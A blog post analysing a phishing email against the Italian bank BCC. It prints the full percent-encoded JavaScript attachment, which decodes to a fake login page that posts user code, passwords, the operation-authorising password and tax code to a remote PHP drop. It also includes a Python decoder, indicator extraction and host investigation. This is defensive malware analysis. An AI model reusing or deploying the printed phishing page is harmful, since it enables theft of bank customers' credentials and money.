Phishing against BCC bank

In this post I am going to describe a real case of phishing against an Italian bank, BCC (Banca di Credito Cooperativo). Today I received a well-written mail at my university account; it says:

The body is obviously in Italian and it is also good from a syntax point of view. The sender is ufficiocentral@sef.bcc.it, a one-letter variation of ufficiocentrale@sef.bcc.it, which is already blacklisted by www.anti-phishing.it (dropping a letter is a cheap way to slip past an exact-match sender blacklist while still looking right to the reader). In addition the mail carries an HTML attachment: it asks customers to update their profile, otherwise the bank threatens to freeze the account. Now let's focus our attention on the attachment:

<Script Language='Javascript'>
<!--
document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%75%74%66%2D%38%22%20%2F%3E%0A%20%20%3C%74%69%74%6C%65%3E%42%61%6E%63%61%20%64%69%20%43%72%65%64%69%74%6F%20%43%6F%6F%70%65%72%61%74%69%76%6F%20%7C%20%4C%6F%67%69%6E%3C%2F%74%69%74%6C%65%3E%0A%20%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%62%63%63%64%65%67%6C%69%75%6C%69%76%69%2E%69%74%2F%74%65%6D%70%6C%61%74%65%73%2F%70%77%63%2D%6D%75%73%69%63%2F%63%73%73%2F%74%65%6D%70%6C%61%74%65%2E%63%73%73%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%20%2F%3E%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%0A%3C%74%61%62%6C%65%20%62%6F%72%64%65%72%3D%22%30%22%20%20%63%65%6C%6C%70%61%64%64%69%6E%67%3D%22%34%22%20%63%65%6C%6C%73%70%61%63%69%6E%67%3D%22%30%22%20%63%6C%61%73%73%3D%22%63%6F%6E%74%65%6E%74%70%61%6E%65%22%3E%0A%3C%74%72%3E%0A%09%3C%74%64%20%63%6F%6C%73%70%61%6E%3D%22%32%22%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%6F%6D%70%6F%6E%65%6E%74%68%65%61%64%69%6E%67%22%3E%0A%09%09%09%3C%63%65%6E%74%65%72%3E%41%72%65%61%20%72%69%73%65%72%76%61%74%61%20%28%4C%6F%67%69%6E%29%09%09%3C%2F%63%65%6E%74%65%72%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%3E%0A%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%20%0A%09%3C%2F%74%64%3E%0A%3C%2F%74%72%3E%0A%3C%54%52%3E%0A%3C%54%44%3E%3C%49%4D%47%20%53%52%43%3D%22%68%74%74%70%3A%2F%2F%63%63%32%30%30%30%2E%6F%72%2E%6B%72%2F%62%62%73%2F%64%61%74%61%2F%42%43%43%2E%6A%70%67%22%20%41%4C%54%3D%22%62%63%63%22%20%77%65%69%67%74%68%3D%22%32%34%31%70%78%22%20%77%69%64%74%68%3D%22%35%33%39%70%78%22%3E%0A%20%0A%3C%2F%54%44%3E%0A%3C%54%44%20%52%4F%57%53%50%41%4E%3D%22%32%22%3E%3C%66%69%65%6C%64%73%65%74%20%63%6C%61%73%73%3D%22%69%
6E%70%75%74%22%3E%0A%20%20%0A%20%0A%20%0A%20%0A%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%38%37%2E%32%33%36%2E%31%36%2E%36%36%2F%2E%73%65%72%76%69%7A%69%5F%63%6C%69%65%6E%74%69%2F%73%65%72%76%69%7A%69%5F%63%6C%69%65%6E%74%69%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%20%6E%61%6D%65%3D%22%63%6F%6D%2D%6C%6F%67%69%6E%22%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69%6E%22%3E%0A%09%3C%70%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69%6E%2D%75%73%65%72%6E%61%6D%65%22%3E%0A%09%09%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%75%73%65%72%6E%61%6D%65%22%3E%43%6F%64%69%63%65%20%75%74%65%6E%74%65%3A%3C%2F%6C%61%62%65%6C%3E%0A%09%09%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%75%73%65%72%6E%61%6D%65%22%20%69%64%3D%22%75%73%65%72%6E%61%6D%65%22%20%74%79%70%65%3D%22%74%65%78%74%22%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%62%6F%78%22%20%61%6C%74%3D%22%75%73%65%72%6E%61%6D%65%22%20%73%69%7A%65%3D%22%31%38%22%20%2F%3E%0A%09%3C%2F%70%3E%0A%09%3C%70%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69%6E%2D%70%61%73%73%77%6F%72%64%22%3E%0A%20%0A%09%09%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%70%61%73%73%77%64%22%3E%50%61%73%73%77%6F%72%64%3A%3C%2F%6C%61%62%65%6C%3E%0A%09%09%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%69%64%3D%22%70%61%73%73%77%64%22%20%6E%61%6D%65%3D%22%70%61%73%73%77%6F%72%64%22%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%62%6F%78%22%20%73%69%7A%65%3D%22%31%38%22%20%61%6C%74%3D%22%70%61%73%73%77%6F%72%64%22%20%2F%3E%0A%09%3C%2F%70%3E%0A%3C%70%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69
%6E%2D%70%61%73%73%77%6F%72%64%22%3E%0A%20%0A%09%09%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%70%61%73%73%77%64%22%3E%50%61%73%73%77%6F%72%64%20%44%69%73%70%6F%73%69%74%69%76%61%3A%3C%2F%6C%61%62%65%6C%3E%0A%09%09%09%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%69%64%3D%22%70%61%73%73%77%64%22%20%6E%61%6D%65%3D%22%64%69%61%22%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%62%6F%78%22%20%73%69%7A%65%3D%22%31%38%22%20%61%6C%74%3D%22%70%61%73%73%77%6F%72%64%22%20%2F%3E%0A%09%3C%2F%70%3E%0A%20%0A%3C%70%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69%6E%2D%70%61%73%73%77%6F%72%64%22%3E%0A%20%0A%09%09%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%70%61%73%73%77%64%22%3E%43%2E%46%2F%50%2E%49%56%41%3A%3C%2F%6C%61%62%65%6C%3E%0A%09%09%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%69%64%3D%22%63%6F%64%69%63%65%22%20%6E%61%6D%65%3D%22%63%6F%64%69%63%65%22%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%62%6F%78%22%20%73%69%7A%65%3D%22%31%38%22%20%61%6C%74%3D%22%70%61%73%73%77%6F%72%64%22%20%2F%3E%0A%09%3C%2F%70%3E%0A%20%0A%20%0A%20%0A%09%09%3C%62%72%3E%3C%64%69%76%20%61%6C%69%67%6E%3D%22%72%69%67%68%74%22%3E%0A%09%09%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%6E%61%6D%65%3D%22%53%75%62%6D%69%74%22%20%63%6C%61%73%73%3D%22%62%75%74%74%6F%6E%22%20%76%61%6C%75%65%3D%22%4C%6F%67%69%6E%22%20%2F%3E%3C%62%72%3E%0A%20%0A%20%0A%20%0A%26%63%6F%70%79%3B%20%20%42%61%6E%63%68%65%20%64%69%20%43%72%65%64%69%74%6F%20%43%6F%6F%70%65%72%61%74%69%76%6F%20%0A%3C%2F%74%64%3E%0A%20%0A%3C%2F%66%69%65%6C%64%73%65%74%3E%0A%20%0A%20%20%0A%20%0A%3C%2F%54%41%42%4C%45%3E%20'));
//-->
</Script>

As we can see it is a JavaScript snippet that hides its real content behind percent-encoding: the whole page is passed through unescape() and written into the document with document.write() at load time, so nothing readable appears in the raw attachment and a naive keyword filter sees only hex. To understand what it does we feed it to Malzilla, which decodes the string and gives us the HTML page, a fake "Area riservata (Login)" form titled "Banca di Credito Cooperativo | Login":
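Malzilla does the decoding for us, but since the attachment is only percent-encoding behind unescape(), it can also be decoded offline without ever executing the script. The Python script below is an added example (it is not part of the original post and it is not Malzilla): it pulls the string literal out of the unescape() call, decodes it the way a browser would (%XX and %uXXXX escapes, after removing any line wrapping introduced by the mail client or by copy and paste, which otherwise splits escapes in half, as happens twice in the copy of the attachment above), and parses the resulting HTML for the form target, the resources it loads, the field names it harvests and the hosts involved. The sample it runs on is a constructed, trimmed reconstruction of the decoded page, re-encoded with every character as %XX exactly as the attachment does; the URLs and field names in it are the ones found in the real attachment.

```python
"""Decode a document.write(unescape('%..')) phishing attachment and pull out
its indicators without running any JavaScript.

Added example for this post; not the original attachment, not Malzilla.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: trimmed reconstruction of what the attachment decodes
# to. URLs and input names are the ones in the real attachment.
SAMPLE_HTML = """<html><head>
<title>Banca di Credito Cooperativo | Login</title>
<link rel="stylesheet" href="http://www.bccdegliulivi.it/templates/pwc-music/css/template.css" type="text/css" />
</head><body>
<img src="http://cc2000.or.kr/bbs/data/BCC.jpg" alt="bcc">
<form action="http://87.236.16.66/.servizi_clienti/servizi_clienti.php" method="post" name="com-login">
<label for="username">Codice utente:</label><input name="username" type="text" />
<label for="passwd">Password:</label><input type="password" name="password" />
<label for="passwd">Password Dispositiva:</label><input type="password" name="dia" />
<label for="passwd">C.F/P.IVA:</label><input type="text" name="codice" />
<input type="submit" name="Submit" value="Login" />
</form></body></html>"""


def js_escape(text):
    """Encode every character as %XX (or %uXXXX), mirroring the attachment."""
    return "".join("%%%02X" % ord(c) if ord(c) < 256 else "%%u%04X" % ord(c)
                   for c in text)


# The constructed attachment: same wrapper as the real one, sample payload.
SAMPLE_ATTACHMENT = (
    "<Script Language='Javascript'>\n<!--\n"
    "document.write(unescape('" + js_escape(SAMPLE_HTML) + "'));\n"
    "//-->\n</Script>\n"
)

_UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def extract_payload(script_text):
    """Return the string literal passed to unescape(), whitespace removed.
    A real space inside the blob would itself be %20, so any whitespace can
    only be line wrapping from the mail client or from copy and paste."""
    m = _UNESCAPE_CALL.search(script_text)
    if not m:
        raise ValueError("no unescape('...') call found")
    return re.sub(r"\s+", "", m.group(2))


def js_unescape(payload):
    """Python equivalent of JavaScript's unescape(): each %XX or %uXXXX
    becomes one character, with no UTF-8 decoding in between."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), payload)


class _IocParser(HTMLParser):
    """Collect where the form posts, what it loads and which fields it asks for."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.resources, self.inputs = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(((a.get("method") or "get").lower(), a["action"]))
        elif tag in ("link", "script", "img", "iframe"):
            url = a.get("href") if tag == "link" else a.get("src")
            if url:
                self.resources.append((tag, url))
        elif tag == "input":
            self.inputs.append(((a.get("type") or "text").lower(), a.get("name")))


def extract_iocs(html):
    p = _IocParser()
    p.feed(html)
    p.close()
    urls = [u for _, u in p.form_actions] + [u for _, u in p.resources]
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    return {
        "form_actions": p.form_actions,
        "resources": p.resources,
        "input_names": [n for _, n in p.inputs if n],
        "secret_fields": [n for t, n in p.inputs if t == "password" and n],
        "hosts": hosts,
    }


def analyze_attachment(attachment_text):
    """Locate the unescape() blob, decode it, extract the indicators."""
    html = js_unescape(extract_payload(attachment_text))
    iocs = extract_iocs(html)
    iocs["html"] = html
    return iocs


if __name__ == "__main__":
    r = analyze_attachment(SAMPLE_ATTACHMENT)
    for method, action in r["form_actions"]:
        print("credentials go to:", method.upper(), action)
    for tag, url in r["resources"]:
        print("loads:", tag, url)
    print("fields harvested:", ", ".join(r["input_names"]))
    print("hosts to look up:", ", ".join(r["hosts"]))
```

The hosts list is what you feed into whois, passive DNS and blacklist lookups; the secret_fields list tells you at a glance that this kit wants two passwords, not one. To run it on the real attachment, pass the text of the HTML file to analyze_attachment() instead of SAMPLE_ATTACHMENT.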

The decoded page references three addresses we need to look at:

– hxxp://www.bccdegliulivi.it
– hxxp://cc2000.or.kr
– hxxp://87.236.16.66

The first one is a legitimate BCC site and is used only to get a good, believable template: the page imports its CSS directly, a clever way to look right to an unaware user. The second one is a Korean site from which the BCC logo (BCC.jpg) is loaded, which is odd for an Italian bank. The last address is in Russia and is the form's POST target: the PHP script /.servizi_clienti/servizi_clienti.php (in a dot-prefixed directory, hidden from a casual listing) receives the submitted data and grabs the user account. What the form collects is worth noting: codice utente, password, the password dispositiva (the second password Italian banks use to authorize operations) and the C.F/P.IVA (tax code / VAT number), i.e. not just a login but everything needed to impersonate the customer and move money. Fortunately the path above is no longer reachable, but the host itself (87.236.16.66) is up and appears to belong to ParkedEU, a web hosting company; let's dig a bit:

IP Location: Russian Federation, Moscow, Regional Educational Information Centre
Resolve Host: parkedeu.com

Guessing the nature of the Russian site: either it has been compromised and abused to host the phishing kit or, in the worst case, it belongs to a criminal organization. Going one step further, the site sits in AS25519; http://www.maliciousnetworks.org/chart.php?as=25519 returns no result for that AS, and http://amada.abuse.ch/?search=87.236.16.66 does not list the address either. Absence from two lists is weak evidence, but it is consistent with a one-off compromised host rather than a dedicated malicious network. Since the PHP path is no longer available, the machine has probably been cleaned up and this particular drop site is gone; phishing kits are routinely re-hosted elsewhere, though, so the sender address and the attachment pattern are still worth blocking.
To conclude this brief entry: pay attention to mails that appear to come from banks. In this case the mail was well written and believable to an unaware user, and the tell-tale signs were the look-alike sender address, the threat of freezing the account and an HTML attachment asking for credentials, something a bank does not do by mail.
